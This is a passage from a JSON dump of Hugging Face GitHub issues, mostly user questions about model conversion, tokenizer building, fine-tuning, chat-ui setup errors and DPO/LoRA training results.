(lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (v_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (o_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (rotary_emb): LlamaRotaryEmbedding()\r\n )\r\n (mlp): LlamaMLP(\r\n (gate_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=13824, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=13824, bias=False)\r\n )\r\n (up_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=13824, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit", "url": "https://github.com/huggingface/peft/issues/1245", "state": "closed", "labels": [], "created_at": "2023-12-10T03:08:54Z", "updated_at": "2023-12-11T11:15:25Z", "user": "daehuikim" }, { "repo": "huggingface/diffusers", "number": 6113, "title": "How to use the models from sd_control_collection hf repo in diffusers", "body": "How to load/convert the models at https://huggingface.co/lllyasviel/sd_control_collection/tree/main with diffusers?\r\n\r\n```\r\n>>> pipe = diffusers.StableDiffusionPipeline.from_single_file(\"diffusers_xl_canny_full.safetensors\")\r\nTraceback (most recent call last):\r\n File \"\", line 1, in \r\n File \"/home/ubuntu/.local/lib/python3.10/site-packages/diffusers/loaders/single_file.py\", line 261, in from_single_file\r\n pipe = download_from_original_stable_diffusion_ckpt(\r\n File \"/home/ubuntu/.local/lib/python3.10/site-packages/diffusers/pipelines/stable_diffusion/convert_from_ckpt.py\", line 1436, in download_from_original_stable_diffusion_ckpt\r\n converted_unet_checkpoint = convert_ldm_unet_checkpoint(\r\n File \"/home/ubuntu/.local/lib/python3.10/site-packages/diffusers/pipelines/stable_diffusion/convert_from_ckpt.py\", line 426, in convert_ldm_unet_checkpoint\r\n new_checkpoint[\"time_embedding.linear_1.weight\"] = unet_state_dict[\"time_embed.0.weight\"]\r\nKeyError: 'time_embed.0.weight'\r\n```\r\nAlso not able to convert it via hf script: https://github.com/huggingface/diffusers/blob/main/scripts/convert_original_controlnet_to_diffusers.py\r\n\r\nWe are able to run it through https://github.com/AUTOMATIC1111 webui. How can it be used with diffusers?", "url": "https://github.com/huggingface/diffusers/issues/6113", "state": "closed", "labels": [], "created_at": "2023-12-09T14:11:26Z", "updated_at": "2024-06-11T18:22:03Z", "user": "anilsathyan7" }, { "repo": "huggingface/tokenizers", "number": 1410, "title": "How to create Tokenizer.json?", "body": "I have this tokenizer and I want to convert it to **tokenizer.json** format.\r\n\r\n- added_tokens.json \r\n- normalizer.json \r\n- special_tokens_map.json\r\n- config.json \r\n- preprocessor_config.json \r\n- vocab.json\r\n- merges.txt \r\n- pytorch_model.bin\r\n\r\nIs it possible to replace my tokenizer data with the original **tokenizer.json**?\r\n\r\n```\r\nimport json\r\n\r\nj = open('hf/tokenizer.json')\r\ndata = json.load(j)\r\n\r\nwith open('medium-tokenizer/merges.txt') as f:\r\n merges = f.readlines()\r\nmerges.pop(0)\r\n\r\nj = open('medium-tokenizer/vocab.json')\r\nvocab = json.load(j)\r\nj = open('medium-tokenizer/added_tokens.json')\r\nadded_tokens = json.load(j)\r\nj = open('medium-tokenizer/normalizer.json')\r\nnormalizer = json.load(j)\r\n\r\ndata['added_tokens'] = added_tokens\r\ndata['normalizer'] = normalizer\r\ndata['model']['vocab'] = vocab\r\ndata['model']['merges'] = merges\r\n\r\nwith open(\"tokenizer.json\", \"w\") as outfile:\r\n json.dump(data, outfile)\r\n```", "url": "https://github.com/huggingface/tokenizers/issues/1410", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-08T09:41:18Z", "updated_at": "2024-01-14T01:52:39Z", "user": "kenaii" }, { "repo": "huggingface/optimum", "number": 1577, "title": "Support the ORT of the Stable Diffusion XL inpaint model", "body": "### Feature request\r\n\r\nHi all.\r\n\r\nWe would like to convert the stable-diffusion-xl-inpaint model below to ONNX and run it using ORT. The conversion to ONNX went well using Optimum's cli, but there doesn't seem to be a Python class for ORT inference.\r\n\r\nhttps://huggingface.co/diffusers/stable-diffusion-xl-1.0-inpainting-0.1\r\n\r\nIs there a way to perform inference on this model with the optimum package? If not, do you have any plans to provide support?\r\n\r\nThank you\r\n\r\n### Motivation\r\n\r\nTo run sd-xl inpaint model with ORT\r\n\r\n### Your contribution\r\n\r\nI can submit a PR for you if I have something to help", "url": "https://github.com/huggingface/optimum/issues/1577", "state": "closed", "labels": [ "feature-request", "Stale" ], "created_at": "2023-12-08T09:21:06Z", "updated_at": "2025-02-19T02:02:54Z", "comments": 2, "user": "0-chan-kor" }, { "repo": "huggingface/chat-ui", "number": 617, "title": "Does Chat-UI support multithreading?", "body": "Maybe it depends on node.js, but I want to know the CPU utilization.", "url": "https://github.com/huggingface/chat-ui/issues/617", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-08T05:36:18Z", "updated_at": "2023-12-14T07:30:01Z", "user": "calycekr" }, { "repo": "huggingface/chat-ui", "number": 615, "title": "npm run error (latest git pull)", "body": "I created a .env.local as:\r\n```\r\nMONGODB_URL=mongodb://localhost:27017\r\nMONGODB_DB_NAME=chat-ui\r\nMONGODB_DIRECT_CONNECTION=false\r\n\r\nCOOKIE_NAME=hf-chat\r\nHF_TOKEN=\r\nHF_API_ROOT=https://api-inference.huggingface.co/models\r\nOPENAI_API_KEY=\r\n\r\n```\r\nThen I tried:\r\n```\r\nnpm install #everything went fine\r\nnpm run dev -- --host 0.0.0.0\r\n```\r\n\r\nbut I got the error below:\r\n```\r\n(node:770942) [DEP0040] DeprecationWarning: The `punycode` module is deprecated. Please use a userland alternative instead.\r\n(Use `node --trace-deprecation ...` to show where the warning was created)\r\n11:47:42 AM [vite] Error when evaluating SSR module /src/lib/server/auth.ts:\r\n|- SyntaxError: \"undefined\" is not valid JSON\r\n at JSON.parse ()\r\n at /home/shuther/devProjects/chat-ui/src/lib/server/auth.ts:43:14\r\n at async instantiateModule (file:///home/shuther/devProjects/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:54405:9)\r\n\r\n11:47:42 AM [vite] Error when evaluating SSR module /src/hooks.server.ts: failed to import \"/src/lib/server/auth.ts\"\r\n|- SyntaxError: \"undefined\" is not valid JSON\r\n at JSON.parse ()\r\n at /home/shuther/devProjects/chat-ui/src/lib/server/auth.ts:43:14\r\n at async instantiateModule (file:///home/shuther/devProjects/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:54405:9)\r\n\r\nSyntaxError: \"undefined\" is not valid JSON\r\n at JSON.parse ()\r\n at /home/shuther/devProjects/chat-ui/src/lib/server/auth.ts:43:14\r\n at async instantiateModule (file:///home/shuther/devProjects/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:54405:9)\r\nSyntaxError: \"undefined\" is not valid JSON\r\n at JSON.parse ()\r\n at /home/shuther/devProjects/chat-ui/src/lib/server/auth.ts:43:14\r\n at async instantiateModule (file:///home/shuther/devProjects/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:54405:9)\r\n\r\n```\r\n\r\nOn the browser side, I have error 500 (nice picture)", "url": "https://github.com/huggingface/chat-ui/issues/615", "state": "closed", "labels": [ "support" ], "created_at": "2023-12-07T10:59:53Z", "updated_at": "2024-04-24T12:29:46Z", "comments": 4, "user": "shuther" }, { "repo": "huggingface/chat-ui", "number": 614, "title": "Docker build - multiple errors - documentation", "body": "I can't find documentation to build it myself; so I tried:\r\n`docker-compose build up`\r\nBut I got multiple errors amoung:\r\n\r\n> chat-ui/.env: line 23: unexpected character \"\\\"\" in variable name \"\\\"PROVIDER_URL\\\": \\\"\\\",\"\r\n\r\nEven `source .env` returned multiple errors; I tried to change the `into a ' with no luck.\r\n\r\nMy goal was to build it and include it into a docker compose.", "url": "https://github.com/huggingface/chat-ui/issues/614", "state": "open", "labels": [ "support" ], "created_at": "2023-12-07T10:55:04Z", "updated_at": "2024-06-01T12:44:18Z", "comments": 4, "user": "shuther" }, { "repo": "huggingface/text-generation-inference", "number": 1318, "title": "how to run tgi installed locally without any UI", "body": "### System Info\n\nhow to run tgi installed locally without any UI?\r\n pip install text-generation , giving error: ERROR: No matching distribution found for text-generation\n\n### Information\n\n- [ ] Docker\n- [X] The CLI directly\n\n### Tasks\n\n- [X] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\n pip install text-generation\n\n### Expected behavior\n\nneed some help running tgi+my model on cmdline", "url": "https://github.com/huggingface/text-generation-inference/issues/1318", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-07T08:47:13Z", "updated_at": "2024-01-13T01:46:40Z", "user": "poojitharamachandra" }, { "repo": "huggingface/autotrain-advanced", "number": 376, "title": "How to a Autotrain Seq2Seq ? ", "body": "Hi everyone , I'm trying to finetune a Helsinki-NLP/opus-mt-tc-big-ar-en on local arabic of morocco which is called Daraija Arabic , the problem is that I'm unable to use Autotrain I keep getting 500 error code \r\n![Screenshot 2023-12-07 011848](https://github.com/huggingface/autotrain-advanced/assets/112639221/ece3ee15-9f89-44ff-bf51-c5231f1858e7)\r\n![Screenshot 2023-12-07 011912](https://github.com/huggingface/autotrain-advanced/assets/112639221/2dea03ae-afcd-4e86-a7b3-d175ff6bc555)\r\n[output.csv](https://github.com/huggingface/autotrain-advanced/files/13593069/output.csv)\r\nFYI : I didnt modify Training Parameters (find params to copy-paste [here] area so I dont know if its necessary ", "url": "https://github.com/huggingface/autotrain-advanced/issues/376", "state": "closed", "labels": [], "created_at": "2023-12-07T00:22:46Z", "updated_at": "2023-12-08T17:27:57Z", "user": "Lachkar-Ahmed-Salim" }, { "repo": "huggingface/autotrain-advanced", "number": 375, "title": "How to do a Seq2Seq Autotrain ?", "body": "", "url": "https://github.com/huggingface/autotrain-advanced/issues/375", "state": "closed", "labels": [], "created_at": "2023-12-07T00:10:33Z", "updated_at": "2023-12-11T09:41:24Z", "user": "Lachkar-Ahmed-Salim" }, { "repo": "huggingface/alignment-handbook", "number": 68, "title": "DPO alignment doesn't work on Lora models as suggested ", "body": "You claim that \"[In practice, we find comparable performance for both full and LoRA fine-tuning, with the latter having the advantage of producing small adapter weights that are fast to upload and download from the Hugging Face Hub.](https://github.com/huggingface/alignment-handbook/tree/main/scripts#:~:text=In%20practice%2C%20we%20find%20comparable%20performance%20for%20both%20full%20and%20LoRA%20fine%2Dtuning%2C%20with%20the%20latter%20having%20the%20advantage%20of%20producing%20small%20adapter%20weights%20that%20are%20fast%20to%20upload%20and%20download%20from%20the%20Hugging%20Face%20Hub.)\"\r\n\r\nHowever, when I try the Lora model DPO-aligned LLM that you have trained, [alignment-handbook/zephyr-7b-dpo-lora](https://huggingface.co/alignment-handbook/zephyr-7b-dpo-lora), I experience a total performance degradation. \r\nHere is an example of model output that seems confused:\r\n![image](https://github.com/huggingface/alignment-handbook/assets/3280518/1c5eae99-9641-469a-bb73-b66a26a594d4)\r\n\r\nEven the training loss indicates that the model has not learned much\r\n\"image\"\r\n\r\nHere is the training loss for the full model DPO alignment. \r\n![image](https://github.com/huggingface/alignment-handbook/assets/3280518/902aaf32-0446-4ab1-8e38-28afcd456fed)\r\n \r\nWould you please do a clarification? Is my observation different from what you have experienced?\r\n\r\nThanks\r\n", "url": "https://github.com/huggingface/alignment-handbook/issues/68", "state": "open", "labels": [], "created_at": "2023-12-06T19:12:30Z", "updated_at": "2023-12-07T09:43:32Z", "comments": 1, "user": "Abe13" }, { "repo": "huggingface/alignment-handbook", "number": 66, "title": "How to specify another GPU to run rather than cuda:0?", "body": "I tried to modify the --gpu_ids paramater in recipes/accelerate_configs/multi_gpu.yaml, however, it didn't work, the device was still 'cuda:0'.", "url": "https://github.com/huggingface/alignment-handbook/issues/66", "state": "closed", "labels": [], "created_at": "2023-12-06T10:48:25Z", "updated_at": "2023-12-06T11:13:02Z", "user": "njupopsicle" }, { "repo": "huggingface/datasets", "number": 6478, "title": "How to load data from lakefs", "body": "My dataset is stored on the company's lakefs server. How can I write code to load the dataset? It would be great if I could provide code examples or provide some references\r\n", "url": "https://github.com/huggingface/datasets/issues/6478", "state": "closed", "labels": [], "created_at": "2023-12-06T09:04:11Z", "updated_at": "2024-07-03T19:13:57Z", "user": "d710055071" }, { "repo": "huggingface/tokenizers", "number": 1407, "title": "How to add byte_fallback tokens?", "body": "# Alternative title\r\n\r\nHow to make a tokenizer behaving similarly to Llama\r\n\r\n## Background \r\n\r\nLlama tokenizer considers byte_fallback tokens **not special**. When it decodes, it doesn't remove these tokens other than special tokens (unk, pad, bos, eos).\r\n\r\n## What I am trying to do\r\n\r\nI'm trying to create a tokenizer behaving like Llama. However, I **am only able** to add byte_fallback tokens as **special tokens**.\r\n\r\n```python\r\nfrom tokenizers import Tokenizer\r\nfrom tokenizers import decoders, pre_tokenizers\r\nfrom tokenizers.models import BPE\r\nfrom tokenizers.processors import TemplateProcessing\r\nfrom tokenizers.trainers import BpeTrainer\r\nfrom tokenizers import AddedToken\r\n\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset(\"tapaco\")\r\n\r\ndef topaco_generator():\r\n for i in dataset['train']:\r\n yield i['paraphrase']\r\n\r\nbpe_trainer = BpeTrainer(\r\n special_tokens=[\"\", \"\", \"\", \"\"]\r\n + [f\"<0x{i:02X}>\" for i in range(256)] # byte_fallback tokens\r\n)\r\n\r\ntokenizer = Tokenizer(BPE(byte_fallback=True))\r\ntokenizer.pre_tokenizer = pre_tokenizers.Sequence(\r\n [pre_tokenizers.Metaspace(), pre_tokenizers.Digits(individual_digits=True)]\r\n)\r\ntokenizer.enable_padding(pad_id=3, pad_token=\"\")\r\ntokenizer.post_processor = TemplateProcessing(\r\n single=\" $A \",\r\n pair=\" $A $B \",\r\n special_tokens=[\r\n (\"\", 1),\r\n (\"\", 2),\r\n ],\r\n)\r\ntokenizer.decoder = decoders.Sequence(\r\n [\r\n decoders.Metaspace(),\r\n decoders.ByteFallback(),\r\n ]\r\n)\r\n# my attempt to add byte_fallback as non-special tokens\r\n# tokenizer.add_tokens([AddedToken(content=f\"<0x{i:02X}>\", special=True, normalized=False) for i in range(256)])\r\n\r\ntokenizer.train_from_iterator(topaco_generator(), trainer=bpe_trainer)\r\ntokenizer.save(\"topaco_tokenizer.json\")\r\n\r\ntokenizer = Tokenizer.from_file(\"topaco_tokenizer.json\")\r\n\r\ntext = \"I love you more than I can say \ud83e\udd17\"\r\nencoded_text = tokenizer.encode(text)\r\nprint(encoded_text.tokens)\r\n# My work around to preverse byte_fallback tokens\r\n# and remove other special tokens\r\ndecoded_text = tokenizer.decode(encoded_text.ids, skip_special_tokens=False)\r\nprint(decoded_text.removeprefix(' ').removesuffix(''))\r\n```\r\n\r\n## Problem\r\n\r\nNo matter how I tried this line `tokenizer.add_tokens([AddedToken(content=f\"<0x{i:02X}>\", special=True, normalized=False) for i in range(256)])` with different position in my code (before training, after training) and with different parameters of AddedToken, I still can not achieve Llama's behavior. ", "url": "https://github.com/huggingface/tokenizers/issues/1407", "state": "open", "labels": [ "bytefallback", "Feature Request" ], "created_at": "2023-12-06T09:03:35Z", "updated_at": "2024-08-27T01:57:04Z", "user": "dinhanhx" }, { "repo": "huggingface/transformers.js", "number": 432, "title": "Cannot download the model from huggingface", "body": "Because of the network reason, when using transfomer.js we cannot download the model successful\r\nHow to set the network proxy for the model download\r\n", "url": "https://github.com/huggingface/transformers.js/issues/432", "state": "open", "labels": [ "question" ], "created_at": "2023-12-06T08:18:58Z", "updated_at": "2023-12-10T13:42:50Z", "user": "wujohns" }, { "repo": "huggingface/blog", "number": 1677, "title": "how to achieve image-text matching of BLIP2", "body": "Hi, Thanks to the authors for the works.\r\nI am trying to achieve image-text matching of BLIP2, but I didn't find any examples of that. Can you give me some help or tips?", "url": "https://github.com/huggingface/blog/issues/1677", "state": "open", "labels": [], "created_at": "2023-12-06T07:03:21Z", "updated_at": "2023-12-06T07:08:48Z", "user": "wkqun555" }, { "repo": "huggingface/diffusers", "number": 6070, "title": "How to overload existing class in diffusers", "body": "That's just for personal development. I want to write a new class inherited from existing class (e.g. `ControlNetModel`) and I added some new parameters to `__init__` function, but found that the `__init__` function is still the parent's implementation, whether to add the decorator `register_to_config` or not.\r\n\r\nHope some advice.\r\n", "url": "https://github.com/huggingface/diffusers/issues/6070", "state": "closed", "labels": [], "created_at": "2023-12-06T06:41:44Z", "updated_at": "2024-09-25T14:44:04Z", "user": "OrangeSodahub" }, { "repo": "huggingface/diffusers", "number": 6067, "title": "How to run the fine_tuned model?", "body": "Hi all,\r\n\r\nI used the instructions given [here](https://github.com/huggingface/diffusers/tree/main/examples/dreambooth) to fine_tune the model on dog pictures (as explained in the link).\r\nThe fine_tuning has finished, and a folder called path-to-save-model has been created (that has the weights of the model). Now how do I use this output? Do I run test_dreambooth.py? (I tried running it but it gives error at \"from test_examples_utils import ExamplesTestsAccelerate, run_command # noqa: E402\"\r\n\r\nI appreciate it if someone can please let me know how to use the output of the trained model.\r\n\r\nThank you", "url": "https://github.com/huggingface/diffusers/issues/6067", "state": "closed", "labels": [], "created_at": "2023-12-06T01:01:56Z", "updated_at": "2025-04-28T10:32:33Z", "user": "alireza18878" }, { "repo": "huggingface/text-generation-inference", "number": 1314, "title": "What is the default tokenizer behaviour?", "body": "### System Info\n\nN/A\n\n### Information\n\n- [ ] Docker\n- [X] The CLI directly\n\n### Tasks\n\n- [X] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nI'm trying to understand whether special tokens (i.e. BOS and EOS) are added and suppressed on tokenization and decoding.\r\n\r\nEncoding:\r\n- I searched for add_special_tokens in the repo and I don't see anywhere this is being set to true when tokenizing. So, it seems that there are no EOS tokens automatically added.\r\n\r\nDecoding:\r\n- I searched for skip_special_tokens and it seems that [here](https://github.com/huggingface/text-generation-inference/blob/3238c49121b02432bf2938c6ebfd44f06c5adc2f/server/text_generation_server/models/causal_lm.py#L525) on line 541 that indeed BOS and EOS are being supressed.\r\n\r\nIs this understanding correct?\n\n### Expected behavior\n\nIf possible, could the default tokenization strategy be described on the ReadMe so users know what to expect?", "url": "https://github.com/huggingface/text-generation-inference/issues/1314", "state": "closed", "labels": [], "created_at": "2023-12-05T17:35:05Z", "updated_at": "2024-01-19T13:14:13Z", "user": "RonanKMcGovern" }, { "repo": "huggingface/chat-ui", "number": 609, "title": "[Feature Request] Uploading PDFS/Text Files/Images?", "body": "I love the search function and it makes the chat feel so much more accurate! I use it mainly as a direct ChatGPT replacment, using code models when needed or normal models for chat.\r\n\r\nCan we have the option to upload images/pdfs/other files to the chat? the images could be integrated by clip/blip, and the PDF or text files could just be added to the context or summarized and then added?\r\n\r\nIt would be awesome to have! Thank you for all the work made into this project", "url": "https://github.com/huggingface/chat-ui/issues/609", "state": "open", "labels": [], "created_at": "2023-12-05T12:20:39Z", "updated_at": "2024-10-04T01:13:18Z", "comments": 3, "user": "iChristGit" }, { "repo": "huggingface/trl", "number": 1059, "title": "How can I have the evaluation pass in only the response to a prompted/instructed generation into the metric.", "body": "I have created the following metric:\r\n```py\r\nclass MyCustomMetric(Metric):\r\n def _info(self):\r\n # Returns the MetricInfo that defines the name, description, etc.\r\n return datasets.MetricInfo(\r\n # This should be a short description of your metric.\r\n description=\"_DESCRIPTION\",\r\n # You can cite papers, GitHub repositories, etc.\r\n citation=\"_CITATION\",\r\n # The inputs and outputs your metric expects.\r\n # These are used to validate the inputs and outputs of _compute\r\n inputs_description=\"_KWARGS_DESCRIPTION\",\r\n features=datasets.Features({\r\n 'predictions': datasets.Value('string'),\r\n 'references': datasets.Value('string')\r\n })\r\n )\r\n\r\n def _compute(self, predictions, references):\r\n # Here is where you should put your main metric computation logic\r\n # Adapt your existing code to fit in here\r\n \r\n fc_results = []\r\n for idx, example in enumerate(predictions):\r\n print(f\"Example {idx}: \", end=\"\")\r\n post_message = \"\"\r\n\r\n # Custom Function Calling metric\r\n prompts = None\r\n try:\r\n generated_arguments, expected_arguments, prompts = json_arguments_from_prompt(\r\n references[idx],\r\n predictions[idx],\r\n INSTRUCTION\r\n # {\"idx\": idx, \"epoch\": epoch}\r\n )\r\n fc_result = fc_metric.run(generated_arguments, expected_arguments)\r\n\r\n fc_results.append(fc_result)\r\n\r\n # if save_prompts_path:\r\n # # add prompts to dpo_data.json\r\n # dpo_data.append({\r\n # \"fc_result\": fc_result,\r\n # **prompts\r\n # })\r\n # with open(save_prompts_path, \"w\") as f:\r\n # json.dump(dpo_data, f)\r\n except Exception as e:\r\n print(f\"Error function calling: {e}\\n\")\r\n fc_results.append(0)\r\n return fc_results\r\n```\r\nThis metric expects the prediction to be generated after passing the instruction. For example I have my prompts in the following format:\r\n` [INST] {message} [/INST] {response}`\r\nI want the evaluation to receive the `predictions` for response and then compare those with my `references`. To reiterate, the predictions should be generated from the model being passed ` [INST] {message} [/INST]`.\r\n\r\nCurrently it seems as if the logits are just generated without any prompt resulting in responses like:\r\n```\r\npredicted_strings: ['Unterscheidung Unterscheidung![: What<>_> in returnFUNCTIONS>\\n the is related, return program should be \" the format formatname format format. functionFUNCTION_CALL>FORM>( <brUNCTIONSCALL_NAMEGSUMENTS>\\nGUMENTS_ASS_THE_FIED_FORM_FORMAT If, respond \" \" response.\\nFUNCTIONS>username\": \"get\",meanalth\",\",function_ \"description\": \"Get health \"input\": [root\": \"string\", \"properties\": {\" \"}] {\"name\": \"leaf_Results\", \"description\": \"Search search list of searchists\", on a search query\", \"parameters\": {\"type\": \"array\", \"properties\": {\"query\": {\"type\": {\"query\": {\"type\": \"string\" \"required\": \"Search\"}} \"type\": \"array\" \"title\": [\"query\"] \"description\": \"Searchphy Search\"}}}, {\"name\": \"getUserending\",\", \"description\": \"Get a list of trifs that on the tr trending\", \"parameters\": {\"type\": \"object\", \"properties\": {\"}}},}\\nUSERFS>\\n me the ofif from a cat cat doingrootSearchResultsFUNCTION_CALL_ARGUMENTS>{\"json\": {\"query\": \"cool cat\"}}\ufffd\ufffd']\r\n```\r\n\r\nafter looking through the source code it seems like modifying the `prediction_step` method inside `Trainer` is the way to go.", "url": "https://github.com/huggingface/trl/issues/1059", "state": "closed", "labels": [], "created_at": "2023-12-04T19:01:34Z", "updated_at": "2024-01-12T15:05:10Z", "user": "CakeCrusher" }, { "repo": "huggingface/distil-whisper", "number": 49, "title": "How to make training data?", "body": "I have a folder like this: \r\naudio_1\r\ntranscript_1.txt\r\naudio_2\r\ntranscript_2.txt\r\n\r\nhow can I make this folder into huggingface dataset?", "url": "https://github.com/huggingface/distil-whisper/issues/49", "state": "open", "labels": [], "created_at": "2023-12-04T18:44:40Z", "updated_at": "2023-12-12T16:51:48Z", "user": "satani99" }, { "repo": "huggingface/computer-vision-course", "number": 77, "title": "Issue with rendering the course", "body": "If we try to render the course to preview how our added content looks like, it throws the following error\r\n```bash\r\nsarthak@kde:~/Desktop/computer-vision-course$ doc-builder preview computer-vision-course chapters/ --not_python_module\r\nInitial build docs for computer-vision-course chapters/ /tmp/tmp0uqdjoxf/computer-vision-course/main/en\r\nBuilding the MDX files: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 29/29 [00:00<00:00, 1288.27it/s]\r\nTraceback (most recent call last):\r\n File \"/home/sarthak/anaconda3/bin/doc-builder\", line 8, in \r\n sys.exit(main())\r\n File \"/home/sarthak/anaconda3/lib/python3.9/site-packages/doc_builder/commands/doc_builder_cli.py\", line 47, in main\r\n args.func(args)\r\n File \"/home/sarthak/anaconda3/lib/python3.9/site-packages/doc_builder/commands/preview.py\", line 171, in preview_command\r\n source_files_mapping = build_doc(\r\n File \"/home/sarthak/anaconda3/lib/python3.9/site-packages/doc_builder/build_doc.py\", line 405, in build_doc\r\n sphinx_refs = check_toc_integrity(doc_folder, output_dir)\r\n File \"/home/sarthak/anaconda3/lib/python3.9/site-packages/doc_builder/build_doc.py\", line 460, in check_toc_integrity\r\n raise RuntimeError(\r\nRuntimeError: The following files are not present in the table of contents:\r\n- en/Unit 5 - Generative Models/variational_autoencoders\r\n- en/Unit 5 - Generative Models/README\r\n- en/Unit 11 - Zero Shot Computer Vision/README\r\n- en/Unit 2 - Convolutional Neural Networks/README\r\n- en/Unit 1 - Fundamentals/README\r\n- en/Unit 8 - 3D Vision, Scene Rendering and Reconstruction/README\r\n- en/Unit 4 - Mulitmodal Models/README\r\n- en/Unit 9 - Model Optimization/README\r\n- en/Unit 6 - Basic CV Tasks/README\r\n- en/Unit 7 - Video and Video Processing/README\r\n- en/Unit 13 - Outlook/README\r\n- en/Unit 3 - Vision Transformers/README\r\n- en/Unit 12 - Ethics and Biases/README\r\n- en/Unit 10 - Synthetic Data Creation/README\r\nAdd them to chapters/_toctree.yml.\r\n```\r\n\r\n**Explanation:** This is because there have been README files added to each chapter. However, these README files are not present in the `_toctree.yml`.\r\n\r\n**Why it's important:** Being able to render the course locally is important as it can give us a rough overview of how the content looks like.\r\n\r\n**Possible solutions could be:**\r\n* Remove the README files for the time being\r\n* Add them to the toctree and also making sure that if anyone adds any chapter contents they also update the toctree making it easier for others to render the course\r\n\r\nOpen for discussion from other members :v: \r\n\r\n", "url": "https://github.com/huggingface/computer-vision-course/issues/77", "state": "open", "labels": [ "question" ], "created_at": "2023-12-04T01:02:22Z", "updated_at": "2023-12-08T18:17:19Z", "user": "sarthak247" }, { "repo": "huggingface/sentence-transformers", "number": 2363, "title": "How to retrieve the epoch of the saved model from model.save ?", "body": "Hi, \r\nThank you for the repo. \r\n\r\nCan anyone help me with retrieving the epoch of the saved model, in both cases where save_best_model=True and save_best_model=False? \r\nThank you\r\n\r\n``` \r\nmodel.fit(train_objectives=[(train_dataloader, train_loss)],\r\n evaluator=evaluator,\r\n epochs=num_epochs,\r\n evaluation_steps=1000,\r\n warmup_steps=warmup_steps,\r\n save_best_model=True,\r\n output_path=output_path)\r\n\r\nmodel.save(path)```", "url": "https://github.com/huggingface/sentence-transformers/issues/2363", "state": "closed", "labels": [], "created_at": "2023-12-02T15:25:52Z", "updated_at": "2024-01-09T22:16:20Z", "user": "gowrijsuria" }, { "repo": "huggingface/transformers.js", "number": 426, "title": "[Question] feature-extraction discrepancies across different platforms", "body": "I'm observing discrepancies in feature-extraction results across different platforms. Here's the code:\r\n\r\n```js\r\nimport { pipeline, env } from '@xenova/transformers'\r\n\r\nconst extractor = await pipeline('feature-extraction', 'Xenova/gte-small', {\r\n quantized: false,\r\n cache_dir: './.cache',\r\n local_files_only: false,\r\n})\r\n\r\nconst text = 'hello'\r\nconst embedding = await extractor(text, { pooling: 'mean', normalize: true })\r\nconst response = Array.from(embedding.data)\r\nconsole.log(JSON.stringify(response, null, 2))\r\n\r\n// Node v20\r\n// \"@xenova/transformers\": \"^2.9.0\"\r\n```\r\n\r\nThe results differ between macOS 13 (Apple Silicon/Arm) and Ubuntu 23.1 (Raspberry Pi/Arm). I've tried various configurations (e.g., pooling, normalize, with and without Array.from) and still observe different results. It's worth noting that sequential calls on the same platform produce consistent results.\r\n\r\nI have a few questions:\r\n\r\n1. Is this discrepancy expected due to the nature of float32 precision and rounding, even though the calculations are performed on ARM architecture?\r\n2. Given that the difference is extremely small, could it still impact accuracy in any significant 